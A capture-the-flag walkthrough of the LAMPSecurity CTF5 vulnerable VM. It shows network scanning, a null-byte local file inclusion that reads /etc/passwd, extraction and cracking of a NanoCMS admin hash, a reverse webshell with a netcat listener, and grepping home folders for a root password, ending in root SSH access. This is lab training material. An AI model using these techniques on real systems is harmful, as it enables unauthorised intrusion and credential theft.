Source Information

Author: madirish2600
Series: LAMPSecurity
Download: download.vulnhub.com/lampsecurity/ctf5.zip

“The LAMPSecurity project is an effort to produce training and benchmarking tools that can be used to educate information security professionals and test products. Please note there are other capture the flag exercises (not just the latest one). Check the SourceForge site to find other exercises available here.”


Getting Started

As always, remember that it’s recommended to use walkthroughs as a “booster” to your own work when attempting to own vulnerable applications.
“For the things we have to learn before we can do them, we learn by doing them.” –Aristotle

To kick things off, we’ll use arp-scan to ARP out across our local network and identify that the CTF5 box has leased the IP address 10.0.88.7.

calvinbebop@Dolos:~$ arp-scan -l | grep 10.
Interface: eth0, datalink type: EN10MB (Ethernet)
10.0.88.1	52:54:00:12:35:00	QEMU
10.0.88.3	08:00:27:e7:ed:99	CADMUS COMPUTER SYSTEMS
10.0.88.2	52:54:00:12:35:00	QEMU
10.0.88.7	08:00:27:6c:b1:92	CADMUS COMPUTER SYSTEMS

Initial Service Enumeration

Now we’ll setup Nmap to initiate a full TCP SYN scan of 10.0.88.7 and hopefully discover potential attack vectors in the system. A complete description of the tool’s flag usage can be found here. As normal, we’ll use the following flags:

Flag Description
-sS Utilize a TCP SYN scan
-sV Probe open ports to determine service/version info
-sC Run the default set of service scripts
-A Enable OS detection, version detection, script scanning, and traceroute
-p- Target all TCP ports from 1-65535
calvinbebop@Dolos:~$ sudo nmap -sS -sV -sC -A -p- 10.0.88.6
sudo nmap -sS -sV -sC -A -p- 10.0.88.7
Starting Nmap 7.70 ( https://nmap.org ) at 2018-12-02 11:29 CST
Nmap scan report for 10.0.88.7
Host is up (0.00062s latency).
Not shown: 65524 closed ports
PORT      STATE SERVICE     VERSION
22/tcp    open  ssh         OpenSSH 4.7 (protocol 2.0)
| ssh-hostkey: 
|   1024 05:c3:aa:15:2b:57:c7:f4:2b:d3:41:1c:74:76:cd:3d (DSA)
|_  2048 43:fa:3c:08:ab:e7:8b:39:c3:d6:f3:a4:54:19:fe:a6 (RSA)
25/tcp    open  smtp        Sendmail 8.14.1/8.14.1
| smtp-commands: localhost.localdomain Hello [10.0.88.5], pleased to meet you, ENHANCEDSTATUSCODES, PIPELINING, 8BITMIME, SIZE, DSN, ETRN, AUTH DIGEST-MD5 CRAM-MD5, DELIVERBY, HELP, 
|_ 2.0.0 This is sendmail 2.0.0 Topics: 2.0.0 HELO EHLO MAIL RCPT DATA 2.0.0 RSET NOOP QUIT HELP VRFY 2.0.0 EXPN VERB ETRN DSN AUTH 2.0.0 STARTTLS 2.0.0 For more info use "HELP <topic>". 2.0.0 To report bugs in the implementation see 2.0.0 http://www.sendmail.org/email-addresses.html 2.0.0 For local information send email to Postmaster at your site. 2.0.0 End of HELP info 
80/tcp    open  http        Apache httpd 2.2.6 ((Fedora))
|_http-server-header: Apache/2.2.6 (Fedora)
|_http-title: Phake Organization
110/tcp   open  pop3        ipop3d 2006k.101
|_pop3-capabilities: STLS TOP UIDL USER LOGIN-DELAY(180)
| ssl-cert: Subject: commonName=localhost.localdomain/organizationName=SomeOrganization/stateOrProvinceName=SomeState/countryName=--
| Not valid before: 2009-04-29T11:31:53
|_Not valid after:  2010-04-29T11:31:53
|_ssl-date: 2018-12-02T17:30:03+00:00; 0s from scanner time.
139/tcp   open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: MYGROUP)
143/tcp   open  imap        University of Washington IMAP imapd 2006k.396 (time zone: -0500)
|_imap-capabilities: MULTIAPPEND NAMESPACE SASL-IR UNSELECT SCAN LOGIN-REFERRALS IDLE IMAP4REV1 STARTTLSA0001 BINARY ESEARCH completed CHILDREN CAPABILITY WITHIN THREAD=REFERENCES THREAD=ORDEREDSUBJECT LITERAL+ UIDPLUS SORT MAILBOX-REFERRALS OK
| ssl-cert: Subject: commonName=localhost.localdomain/organizationName=SomeOrganization/stateOrProvinceName=SomeState/countryName=--
| Not valid before: 2009-04-29T11:31:53
|_Not valid after:  2010-04-29T11:31:53
|_ssl-date: 2018-12-02T17:30:04+00:00; 0s from scanner time.
445/tcp   open  netbios-ssn Samba smbd 3.0.26a-6.fc8 (workgroup: MYGROUP)
| mysql-info: 
|   Protocol: 10
|   Version: 5.0.45
|   Thread ID: 3
|   Capabilities flags: 41516
|   Some Capabilities: ConnectWithDatabase, SupportsTransactions, Speaks41ProtocolNew, LongColumnFlag, Support41Auth, SupportsCompression
|   Status: Autocommit
|_  Salt: BtB/_sE>H.JjY\D|egUR
37048/tcp open  status      1 (RPC #100024)
MAC Address: 08:00:27:6C:B1:92 (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 2.6.X
OS CPE: cpe:/o:linux:linux_kernel:2.6
OS details: Linux 2.6.9 - 2.6.30
Network Distance: 1 hop
Service Info: Hosts: localhost.localdomain, 10.0.88.7; OS: Unix

Host script results:
|_clock-skew: mean: 1h15m00s, deviation: 2h30m01s, median: 0s
| smb-os-discovery: 
|   OS: Unix (Samba 3.0.26a-6.fc8)
|   Computer name: localhost
|   NetBIOS computer name: 
|   Domain name: localdomain
|   FQDN: localhost.localdomain
|_  System time: 2018-12-02T12:30:03-05:00
| smb-security-mode: 
|   account_used: <blank>
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
|_smb2-time: Protocol negotiation failed (SMB2)

TRACEROUTE
HOP RTT     ADDRESS
1   0.62 ms 10.0.88.7

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 89.21 seconds

HTTP (80/TCP) Enumeration (Scanning)

Although there were a number of other services available, I personally like to find my first foothold via a machines’s web application. We’ll now go ahead and kick off a nikto scan of the web server in the background while we conduct a manual investigation of the site.

calvinbebop@Dolos:~$ nikto -h http://10.0.88.7
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          10.0.88.7
+ Target Hostname:    10.0.88.7
+ Target Port:        80
+ Start Time:         2018-12-02 11:39:21 (GMT-6)
---------------------------------------------------------------------------
+ Server: Apache/2.2.6 (Fedora)
+ Retrieved x-powered-by header: PHP/5.2.4
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ Apache/2.2.6 appears to be outdated (current is at least Apache/2.4.12). Apache 2.0.65 (final release) and 2.2.29 are also current.
+ Allowed HTTP Methods: GET, HEAD, POST, OPTIONS, TRACE 
+ Web Server returns a valid response with junk HTTP methods, this may cause false positives.
+ OSVDB-877: HTTP TRACE method is active, suggesting the host is vulnerable to XST
+ /index.php?page=../../../../../../../../../../etc/passwd: PHP include error may indicate local or remote file inclusion is possible.
+ /index.php?page=../../../../../../../../../../boot.ini: PHP include error may indicate local or remote file inclusion is possible.
+ OSVDB-12184: /?=PHPB8B5F2A0-3C92-11d3-A3A9-4C7B08C10000: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-12184: /?=PHPE9568F34-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-12184: /?=PHPE9568F35-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-3092: /phpmyadmin/changelog.php: phpMyAdmin is for managing MySQL databases, and should be protected or limited to authorized hosts.
+ Server leaks inodes via ETags, header found with file /phpmyadmin/ChangeLog, inode: 558008, size: 22676, mtime: Mon Aug 20 21:59:12 2029
+ OSVDB-3092: /phpmyadmin/ChangeLog: phpMyAdmin is for managing MySQL databases, and should be protected or limited to authorized hosts.
+ Cookie SQMSESSID created without the httponly flag
+ OSVDB-3093: /mail/src/read_body.php: SquirrelMail found
+ OSVDB-3093: /squirrelmail/src/read_body.php: SquirrelMail found
+ /info.php: Output from the phpinfo() function was found.
+ OSVDB-3233: /info.php: PHP is installed, and a test script which runs phpinfo() was found. This gives a lot of system information.
+ OSVDB-3268: /icons/: Directory indexing found.
+ OSVDB-3233: /icons/README: Apache default file found.
+ /index.php?module=PostWrap&page=http://cirt.net/rfiinc.txt?: PHP include error may indicate local or remote file inclusion is possible.
+ /index.php?page=http://cirt.net/rfiinc.txt?: PHP include error may indicate local or remote file inclusion is possible.
+ /index.php?page=http://cirt.net/rfiinc.txt?%00: PHP include error may indicate local or remote file inclusion is possible.
+ /index.php?page=http://cirt.net/rfiinc.txt??: PHP include error may indicate local or remote file inclusion is possible.
+ /index.php?page[path]=http://cirt.net/rfiinc.txt??&cmd=ls: PHP include error may indicate local or remote file inclusion is possible.
+ /info.php?file=http://cirt.net/rfiinc.txt?: Output from the phpinfo() function was found.
+ OSVDB-5292: /info.php?file=http://cirt.net/rfiinc.txt?: RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/
+ /phpmyadmin/: phpMyAdmin directory found
+ OSVDB-3092: /phpmyadmin/Documentation.html: phpMyAdmin is for managing MySQL databases, and should be protected or limited to authorized hosts.
+ 8345 requests: 0 error(s) and 32 item(s) reported on remote host
+ End Time:           2018-12-02 11:39:36 (GMT-6) (15 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested

HTTP (80/TCP) Manual Investigation

Welcome to CTF5’s homepage, Phake Organization.

Clicking into the next section of the site, we see a new parameter, page, was used to specify the request for the About Us page.

In the spirit of breaking things, let’s add an apostrophe to the end of page’s value and see what gets returned. Looks like the server isn’t correctly sanitizing input to the include_once function.


Local File Inclusion Vulnerability

Let’s try a few different file inclusion tests and see if we can’t get this function to return files from the local file system. If we’re even luckier, we may be able to have it retrieve files from a remote server. It looks like the server is appending a .php file extension to our parameter’s value though.

An easy workaround is to append a null byte to the parameter’s value. The null byte is a “line terminating” character which means everything after the null byte will be removed, including that pesky .php file extension. And just like that, we have a working local file inclusion vulnerability!

fimap is a useful tool which can help find and exploit local and remote file inclusion bugs in webapps. Since we’ve already identified a working LFI vulnerability, let’s point fimap at it and see what gets returned.

calvinbebop@Dolos:~$ fimap -u 'http://10.0.88.7?page=about'
fimap v.1.00_svn (My life for Aiur)
:: Automatic LFI/RFI scanner and exploiter
:: by Iman Karim (fimap.dev@gmail.com)

SingleScan is testing URL: 'http://10.0.88.7?page=about'
[19:27:54] [OUT] Inspecting URL 'http://10.0.88.7?page=about'...
[19:27:54] [INFO] Fiddling around with URL...
[19:27:54] [OUT] [PHP] Possible file inclusion found! -> 'http://10.0.88.7?page=yfJtdbai' with Parameter 'page'.
[19:27:54] [OUT] [PHP] Identifying Vulnerability 'http://10.0.88.7?page=about' with Parameter 'page'...
[19:27:54] [INFO] Scriptpath received: '/var/www/html'
[19:27:54] [INFO] Operating System is 'Unix-Like'.
[19:27:54] [INFO] Trying NULL-Byte Poisoning to get rid of the suffix...
[19:27:54] [INFO] NULL-Byte Poisoning successfull!
[19:27:54] [INFO] Testing file '/etc/passwd'...
[19:27:54] [INFO] Testing file '/proc/self/environ'...
[19:27:54] [INFO] Skipping absolute file 'php://input'.
[19:27:54] [INFO] Testing file '/var/log/apache2/access.log'...
[19:27:54] [INFO] Testing file '/var/log/apache/access.log'...
[19:27:54] [INFO] Testing file '/var/log/httpd/access.log'...
[19:27:54] [INFO] Testing file '/var/log/apache2/access_log'...
[19:27:54] [INFO] Testing file '/var/log/apache/access_log'...
[19:27:54] [INFO] Testing file '/var/log/httpd/access_log'...
[19:27:54] [INFO] Testing file '/apache/logs/access.log'...
[19:27:54] [INFO] Testing file '/apache/logs/access_log'...
[19:27:54] [INFO] Testing file '/apache2/logs/access.log'...
[19:27:54] [INFO] Testing file '/apache2/logs/access_log'...
[19:27:54] [INFO] Testing file '/etc/httpd/logs/access_log'...
[19:27:54] [INFO] Testing file '/etc/httpd/logs/access.log'...
[19:27:54] [INFO] Testing file '/var/httpd/logs/access_log'...
[19:27:54] [INFO] Testing file '/var/httpd/logs/access.log'...
[19:27:54] [INFO] Testing file '/var/www/logs/access_log'...
[19:27:54] [INFO] Testing file '/var/www/logs/access.log'...
[19:27:54] [INFO] Testing file '/usr/local/apache/logs/access_log'...
[19:27:54] [INFO] Testing file '/usr/local/apache/logs/access.log'...
[19:27:54] [INFO] Testing file '/usr/local/apache2/logs/access_log'...
[19:27:54] [INFO] Testing file '/usr/local/apache2/logs/access.log'...
[19:27:54] [INFO] Testing file '/var/log/access_log'...
[19:27:54] [INFO] Testing file '/var/log/access.log'...
[19:27:54] [INFO] Testing file '/logs/access.log'...
[19:27:54] [INFO] Testing file '/logs/access_log'...
[19:27:54] [INFO] Testing file '/opt/lampp/logs/access_log'...
[19:27:54] [INFO] Testing file '/opt/lampp/logs/access.log'...
[19:27:54] [INFO] Testing file '/opt/xampp/logs/access.log'...
[19:27:54] [INFO] Testing file '/opt/xampp/logs/access_log'...
[19:27:54] [INFO] Testing file '/var/log/auth.log'...
[19:27:54] [INFO] Testing file '/var/log/secure'...
[19:27:54] [INFO] Skipping remote file 'http://www.tha-imax.de/fimap_testfiles/test'.
######################################################################
#[1] Possible PHP-File Inclusion                                     #
######################################################################
#::REQUEST                                                           #
#  [URL]        http://10.0.88.7?page=about                          #
#  [HEAD SENT]                                                       #
#::VULN INFO                                                         #
#  [GET PARAM]  page                                                 #
#  [PATH]       /var/www/html                                        #
#  [OS]         Unix                                                 #
#  [TYPE]       Relative with appendix '.php'                        #
#  [TRUNCATION] Works with 'Null-Byte'. :)                           #
#  [READABLE FILES]                                                  #
#                   [0] /etc/passwd -> /../../../../etc/passwd%00    #
######################################################################

fimap was able to find the same LFI vulnerability we manually identified, however it looks like the only file it was able to read out was the same /etc/passwd password file we retrieved previously. Now that we have a verified way to retrieve files we want from the server, let’s look elsewhere and try to find a vulnerability that might allow for file uploads.



HTTP (80/TCP) Manual Investigation

Next up to bat is the Blog section of the site. Right away, we can spot a couple interesting pieces of information. Firstly, we can see the primary user (and probable webmaster) of the site is someone named Andy Carp. It’s typically a good idea to keep track of user information as we work through different boxes since they may come in handy when it’s time to attempt a brute force attack against a service or application. We can also spot a tidbit at the bottom of the page stating that the server is utilizing NanoCMS, which may come in handy. Finally, there’s a direct link to an Admin Login.


NanoCMS Exploitation

Utilizing a disclosed vulnerability within NanoCMS, we’re able to make a request for /data/pagesdata.txt which returns a semicolon separated, list of variables that are stored in plain text. One of which includes the hashed password for our admin user! A full writeup for this vulnerability can be found at madirish2600’s blog here.


Hash Identification/Cracking

Using hash-identifier, we are able to determine this is an MD5 hashed password.

calvinbebop@Dolos:~$ hash-identifier 
   #########################################################################
   #	 __  __ 		    		__		 	 ______    _____	       #
   #	/\ \/\ \		   		   /\ \ 		/\__  _\  /\  _ `\	       #
   #	\ \ \_\ \     __      ____ \ \ \___		\/_/\ \/  \ \ \/\ \	       #
   #	 \ \  _  \  /'__`\   / ,__\ \ \  _ `\	   \ \ \   \ \ \ \ \	   #
   #	  \ \ \ \ \/\ \_\ \_/\__, `\ \ \ \ \ \	    \_\ \__ \ \ \_\ \	   #
   #	   \ \_\ \_\ \___ \_\/\____/  \ \_\ \_\     /\_____\ \ \____/	   #
   #	    \/_/\/_/\/__/\/_/\/___/    \/_/\/_/     \/_____/  \/___/  v1.1 #
   #								 By Zion3R 							   #
   #							www.Blackploit.com 						   #
   #						       Root@Blackploit.com  				   #
   #########################################################################

   -------------------------------------------------------------------------
 HASH: 9d2f75377ac0ab991d40c91fd27e52fd

Possible Hashs:
[+]  MD5
[+]  Domain Cached Credentials - MD4(MD4(($pass)).(strtolower($username)))

As we’ve seen before, MD5 hashes are relatively easy to crack and numerous online sources are happy to provide the “decrypted” strings for provided hashes. Looks Like our admin password of the day is shannon. Now let’s go see what trouble we can get into with this account.



PHP Reverse WebShell

Using the admin password we’ve just discovered, we’re able to gain access to the Admin portal. Since the admin portal also allows for us to create new pages entirely, I motion that we create a new PHP web page that when retrieved will generate a reverse webshell back to our own machine.

And now, let’s GET the page

SUCCESS!

calvinbebop@Dolos:~$ nc -nvlp 9898
listening on [any] 9898 ...
connect to [10.0.88.5] from (UNKNOWN) [10.0.88.7] 49998
Linux localhost.localdomain 2.6.23.1-42.fc8 #1 SMP Tue Oct 30 13:55:12 EDT 2007 i686 i686 i386 GNU/Linux
 15:47:51 up  3:45,  0 users,  load average: 0.00, 0.00, 0.00
USER     TTY      FROM              LOGIN@   IDLE   JCPU   PCPU WHAT
uid=48(apache) gid=48(apache) groups=48(apache) context=system_u:system_r:httpd_t:s0
sh: no job control in this shell
sh-3.2$

Local Host Enumeration

Getting our bearings, it looks like we’ve gained access to the apache web-server user account.

sh-3.2$ whoami
apache
sh-3.2$ id
uid=48(apache) gid=48(apache) groups=48(apache) context=system_u:system_r:httpd_t:s0
sh-3.2$

Let’s start by taking a look into some of the different users’ home folders on the server

sh-3.2$ ls -lsa /home/
total 56
8 drwxr-xr-x  7 root     root     4096 Apr 28  2009 .
8 drwxr-xr-x 23 root     root     4096 Dec  2 12:02 ..
8 drwxrwxr-x  3 amy      amy      4096 Dec  5  2012 amy
8 drwxrwxr-x 24 andy     andy     4096 Apr 29  2009 andy
8 drwxrwxr-x 23 jennifer jennifer 4096 Apr 29  2009 jennifer
8 drwxrwxr-x 23 loren    loren    4096 Apr 29  2009 loren
8 drwxrwxr-x 25 patrick  patrick  4096 Dec  5  2012 patrick

Lucky for us, our good friend Patrick decided to record the root password (50$cent) inside of a Tomboy note at /home/patrick/.tomboy/481bca0d-7206-45dd-a459-a72ea1131329.note

sh-3.2$ cat 481bca0d-7206-45dd-a459-a72ea1131329.note
<?xml version="1.0" encoding="utf-8"?>
<note version="0.2" xmlns:link="http://beatniksoftware.com/tomboy/link" xmlns:size="http://beatniksoftware.com/tomboy/size" xmlns="http://beatniksoftware.com/tomboy">
  <title>Root password</title>
  <text xml:space="preserve"><note-content version="0.1">Root password

Root password

50$cent</note-content></text>
  <last-change-date>2012-12-05T07:24:52.7364970-05:00</last-change-date>
  <create-date>2012-12-05T07:24:34.3731780-05:00</create-date>
  <cursor-position>15</cursor-position>
  <width>450</width>
  <height>360</height>
  <x>0</x>
  <y>0</y>
  <open-on-startup>False</open-on-startup>
</note>

Although it was certainly feasible to search through the home folders manually on this box, it may be worth saving yourself a bit of time by using a local enumeration script or the power of grep.

sh-3.2$ grep -R password /home/ | grep -v "Permission denied"
...shortened for brevity
/home/patrick/.tomboy/481bca0d-7206-45dd-a459-a72ea1131329.note:  <title>Root password</title>
/home/patrick/.tomboy/481bca0d-7206-45dd-a459-a72ea1131329.note:  <text xml:space="preserve"><note-content version="0.1">Root password
/home/patrick/.tomboy/481bca0d-7206-45dd-a459-a72ea1131329.note:Root password
/home/patrick/.tomboy.log:12/5/2012 7:24:46 AM [DEBUG]: Renaming note from New Note 3 to Root password

Rooted - SSH Login (22/TCP)

Now all that’s left to do is verify the root login works with the password we found.

calvinbebop@Dolos:~$ ssh root@10.0.88.7
root@10.0.88.7's password: _50$cent_
Last login: Tue Aug 12 15:17:41 2014
[root@localhost ~]# id
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel) context=system_u:system_r:unconfined_t:s0-s0:c0.c1023
[root@localhost ~]#

EOL

Thanks for reading and I hope you were able to learn something new! As usual, there are multiple solutions to rooting this box so feel free to take a different approach.
As always, if you have any questions, corrections, or comments, please feel free to reach out to me on Twitter and have yourself an excellent day!